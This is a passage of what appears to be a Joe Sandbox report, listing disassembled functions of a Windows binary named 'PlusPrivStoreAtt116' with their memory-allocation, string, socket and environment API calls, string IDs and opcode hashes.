                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6073
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc$memcpy
                                        • String ID: %s:
                                        • API String ID: 901724546-64597662
                                        • Opcode ID: 61839cf820ee26bdbc720f1c9909bf687cfb3aa2dbcaeb3c9d2cc2500a4ac5e6
                                        • Instruction ID: 11479806d351ef9c59fdf08ebb862aa9cd577aa49c3add0d6cc26dec981c65ae
                                        • Opcode Fuzzy Hash: 61839cf820ee26bdbc720f1c9909bf687cfb3aa2dbcaeb3c9d2cc2500a4ac5e6
                                        • Instruction Fuzzy Hash: CE21B132A08A8581DB10CF12E9542AA7BA4FF94FE8F680536EE5D87396DF7CD445C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: %s: %s
                                        • API String ID: 3056473165-1451338302
                                        • Opcode ID: 7cfbac40d2993e23082487febe9cd17f4b1f6e3b3c90134ddb700a0afe84ba68
                                        • Instruction ID: 35521c236a62141a2316bbec19a4e9502cd4f02ea2e2c6cf4d4b67569549f534
                                        • Opcode Fuzzy Hash: 7cfbac40d2993e23082487febe9cd17f4b1f6e3b3c90134ddb700a0afe84ba68
                                        • Instruction Fuzzy Hash: 5021CD61A0878285FEA19B17A5003B66A51BF84FE8F284132DE5D83BD6DEBCE4858300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Start Date: %s$%s%lx$Start Date
                                        • API String ID: 1294909896-3519493645
                                        • Opcode ID: f38f39d28d763c906cd6ac280683388beb634bb2be022897d7e15e2632003d2a
                                        • Instruction ID: 07e4174ad4488649e8e4a83ed5c5a0171f00389161be2fab7c714af89e5a5412
                                        • Opcode Fuzzy Hash: f38f39d28d763c906cd6ac280683388beb634bb2be022897d7e15e2632003d2a
                                        • Instruction Fuzzy Hash: 1521CD51B0C28249EFE08B2694542FA6F92AF05B8CF645831E94EDB697EFADE5448300
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF6029C98B8), ref: 00007FF6029C9A05
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF6029C98B8), ref: 00007FF6029C9A1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64
                                        • API String ID: 1114863663-3980630743
                                        • Opcode ID: 1efe76ce29a72c0f3d7afe6176bb7ff5a977f40a999ee7b68d1f37e18de54606
                                        • Instruction ID: 971649c26aeaa52d7448b17df52f5a0681a9fade058a3d7013a1725618ec8755
                                        • Opcode Fuzzy Hash: 1efe76ce29a72c0f3d7afe6176bb7ff5a977f40a999ee7b68d1f37e18de54606
                                        • Instruction Fuzzy Hash: D321F632A0CA62C1FB648B22D4A07B97FD49F05F4CF295530CE4EC2296DE6CE604C750
                                        APIs
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029C0DC9,?,?,?,?,00007FF6029C016B), ref: 00007FF6029DC878
                                        • GetEnvironmentVariableA.KERNEL32(?,?,?,00007FF6029C0DC9,?,?,?,?,00007FF6029C016B), ref: 00007FF6029DC89E
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029C0DC9,?,?,?,?,00007FF6029C016B), ref: 00007FF6029DC8BF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029C0DC9,?,?,?,?,00007FF6029C016B), ref: 00007FF6029DC8D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: realloc$EnvironmentVariablefree
                                        • String ID:
                                        • API String ID: 2828309815-0
                                        • Opcode ID: cabc26addc2401d9eb1a58dc0410cf863a4dbc7c9db6dab5f18b53f72baa0c0e
                                        • Instruction ID: 9392c13afd9f7ae0fc95eed5f5a9aca3aa2b738f59778d0962a4b67955c874f9
                                        • Opcode Fuzzy Hash: cabc26addc2401d9eb1a58dc0410cf863a4dbc7c9db6dab5f18b53f72baa0c0e
                                        • Instruction Fuzzy Hash: 0911A521B4DB4286EB608B13658463AAA91FF49FC8F280136DE4E83B45DFBCE440D740
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: 03c04eedff98bd114c8db373987edfe353b16d9b561a06dbe701af264d9b3090
                                        • Instruction ID: bd81b9bb095fcddc54ec59341500bd1ef825b541ab1964d085970538e4ff5c4a
                                        • Opcode Fuzzy Hash: 03c04eedff98bd114c8db373987edfe353b16d9b561a06dbe701af264d9b3090
                                        • Instruction Fuzzy Hash: 60116D35B09B4286E7509F62B84452A7BA0FF88F94B284438EF8D83B15DFBCE945C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Proxy-Connection: Keep-Alive
                                        • API String ID: 1294909896-2835282938
                                        • Opcode ID: 3a9a473e6be16dc48f278ee67881fb5fe137b81527da702573c6769a82dec04a
                                        • Instruction ID: fc1ffbb4205508405f3b16c63ceee1049f758d908f4a03c32a8ad7110ca4d42d
                                        • Opcode Fuzzy Hash: 3a9a473e6be16dc48f278ee67881fb5fe137b81527da702573c6769a82dec04a
                                        • Instruction Fuzzy Hash: A101C062F08B4182FB158B56A5503BAAAA0AF44BF4F144230DFAD473D6DFBCD885D350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64
                                        • API String ID: 1114863663-3980630743
                                        • Opcode ID: fe5f275d4f1dc90b0e93ce1f2398f20e3a9ba4622a9a06e6e7a0640c655e5e6d
                                        • Instruction ID: c1d5a2e732b8d45b5c1bdbd44fca0e8073e1461b2364aadb4a0c82ff8cd7901d
                                        • Opcode Fuzzy Hash: fe5f275d4f1dc90b0e93ce1f2398f20e3a9ba4622a9a06e6e7a0640c655e5e6d
                                        • Instruction Fuzzy Hash: 44F08221B08952C1FF508B22D8E46752F989F49F8CF296531C91EC62D9CEACE201C321
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64
                                        • API String ID: 1114863663-3980630743
                                        • Opcode ID: 34827df1c56d0facd60832e9dcd38fce5df00f1590e788b90f862e58f62967ac
                                        • Instruction ID: 90440d868f73cdab3a4956071008de4247ef26e984d5cb9c5d6bb24475d437da
                                        • Opcode Fuzzy Hash: 34827df1c56d0facd60832e9dcd38fce5df00f1590e788b90f862e58f62967ac
                                        • Instruction Fuzzy Hash: 2AF08221B0C952C1FF508B22D8E46752F989F49F8CF296531C91EC62D9CEADE201C321
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6029C6E86), ref: 00007FF6029F1AE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _errno
                                        • String ID: %lx
                                        • API String ID: 2918714741-1448181948
                                        • Opcode ID: ba9884a06c4138e068495024de9439970d924469e1582dbbadeaf177498449b7
                                        • Instruction ID: 089e51fa60c2ea8a8620d18068d88a8612b54aa7aed504542e62ee521d5721b1
                                        • Opcode Fuzzy Hash: ba9884a06c4138e068495024de9439970d924469e1582dbbadeaf177498449b7
                                        • Instruction Fuzzy Hash: D0814D22A1C1D5C5E7E88A26945027F7FE0EF85798F244235FA9EC26D6DEBCD841CB40
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_,?,00000000,00007FF6029DD1D3), ref: 00007FF6029DD8C2
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_,?,00000000,00007FF6029DD1D3), ref: 00007FF6029DD913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupmalloc
                                        • String ID: (){ %*]
                                        • API String ID: 3515966317-731572209
                                        • Opcode ID: a2d67765c7a5dc4ec3c005a88b734144e7937f55b09edc6cecbb18d84dfcb0d8
                                        • Instruction ID: bfa517f8195de148eae129d034e9695430c2712f188927ce65eb846446e1d4ad
                                        • Opcode Fuzzy Hash: a2d67765c7a5dc4ec3c005a88b734144e7937f55b09edc6cecbb18d84dfcb0d8
                                        • Instruction Fuzzy Hash: F2312913D4D68644FF624B2690503792FD29F56F5CFB84131DA8E832C7CE6EA905E221
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: mallocrealloc
                                        • String ID:
                                        • API String ID: 948496778-3916222277
                                        • Opcode ID: f007defbe466de477ca43de1dbeb36f93a3c148d42cae4483d77c4417899ba6d
                                        • Instruction ID: 68627c07c8d341a67d5d639730c3e44bc06342185a0e32a16d7aaacf845e54d3
                                        • Opcode Fuzzy Hash: f007defbe466de477ca43de1dbeb36f93a3c148d42cae4483d77c4417899ba6d
                                        • Instruction Fuzzy Hash: 80119372609B8181EB449F16E25027977A0FB08FD8F644535DE5E47789EF78D5A0C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: getsockoptsetsockopt
                                        • String ID: @
                                        • API String ID: 194641219-2726393805
                                        • Opcode ID: f6ec6453dcb4e67fffed1e8bcf1aefb452d83f39a6205ecab06ea16d42c783b9
                                        • Instruction ID: 38a2acea9b8ea0ce16a085e47fac5ec191cb565eeca51afe38fae65d1fb62615
                                        • Opcode Fuzzy Hash: f6ec6453dcb4e67fffed1e8bcf1aefb452d83f39a6205ecab06ea16d42c783b9
                                        • Instruction Fuzzy Hash: A7116D71A0828286F724CF51E4556BABBA0EF84758F740430DA9986AA5DFFDE589CF00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: TRUE
                                        • API String ID: 1865132094-3412697401
                                        • Opcode ID: 3eb87d98ead6b4b41aa3a49ae51076edf6b329d4f89bb2bede70efb61867991e
                                        • Instruction ID: a5ce77d9349decf183a31daea749b76b22c07e6299a4774a1b5d3d16cb4d310a
                                        • Opcode Fuzzy Hash: 3eb87d98ead6b4b41aa3a49ae51076edf6b329d4f89bb2bede70efb61867991e
                                        • Instruction Fuzzy Hash: 21015266F4965684FB82CB16E51037A2F62BF04BECF644832DE0E86795DEBCD081C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfreemalloc
                                        • String ID: %s: %s
                                        • API String ID: 3985033223-1451338302
                                        • Opcode ID: 59a004d23c9a7171389107e4b7ac2ba63d9e7849cde71739f0039903f637d0dc
                                        • Instruction ID: 5f4d248649566d9c146afb9ce4ecb3c1c7ad849bcc146eb773a529e9d8f26da7
                                        • Opcode Fuzzy Hash: 59a004d23c9a7171389107e4b7ac2ba63d9e7849cde71739f0039903f637d0dc
                                        • Instruction Fuzzy Hash: FBF04F51A0C78285FBB19B53A8007BA6B50AF85B98F680436DE4E97756DFACE185C700
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6029F0CB8), ref: 00007FF6029FDBB1
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF6029F0CB8), ref: 00007FF6029FDBC4
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6029F0CB8), ref: 00007FF6029FDBEB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF6029F0CB8), ref: 00007FF6029FDBF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: 5abc08f8efcdf07fb6a3fff450b6aa11847ea7856984884628bec1e59b2a9258
                                        • Instruction ID: ffe3f0b05fc86e7e022e954361eda5c2fe27c69bbbdfb656675694840e12c9d2
                                        • Opcode Fuzzy Hash: 5abc08f8efcdf07fb6a3fff450b6aa11847ea7856984884628bec1e59b2a9258
                                        • Instruction Fuzzy Hash: 44118231B08B5282E760CB2AF45012AAAA0FF88BD8F184535EF8D87B59DF7CD5809700
                                        APIs
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6067
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6073
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC546
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC556
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC564
                                        • memset.VCRUNTIME140 ref: 00007FF6029BC59F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$memset
                                        • String ID:
                                        • API String ID: 2717317152-0
                                        • Opcode ID: b476d781683bd605753166caffe2319fbc1c98f8906f10cc98198184c3fa0d6f
                                        • Instruction ID: 76ca8d59752262dcc5323c056891bddf2c35cb5f665a82a8e29fa70f40c23477
                                        • Opcode Fuzzy Hash: b476d781683bd605753166caffe2319fbc1c98f8906f10cc98198184c3fa0d6f
                                        • Instruction Fuzzy Hash: 5F21E932E18B91A3E715CB22D6903A96764FB99744F119226EB9D43A52DFB4F1F1C300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 0cceb363f3383bb9859af09066e7c5d0c6a7185a683f001f5595319a996bee7d
                                        • Instruction ID: f47a32b64cc84ba8b8556bccc23b4e9f6a01236c48e31938c64bd9e2b1bf6818
                                        • Opcode Fuzzy Hash: 0cceb363f3383bb9859af09066e7c5d0c6a7185a683f001f5595319a996bee7d
                                        • Instruction Fuzzy Hash: E411FB36A08A4682EB94DF26E5A033E67A5FF94F98F244431DA5E82765CF7CD890C300
                                        APIs
                                        Memory Dump Source
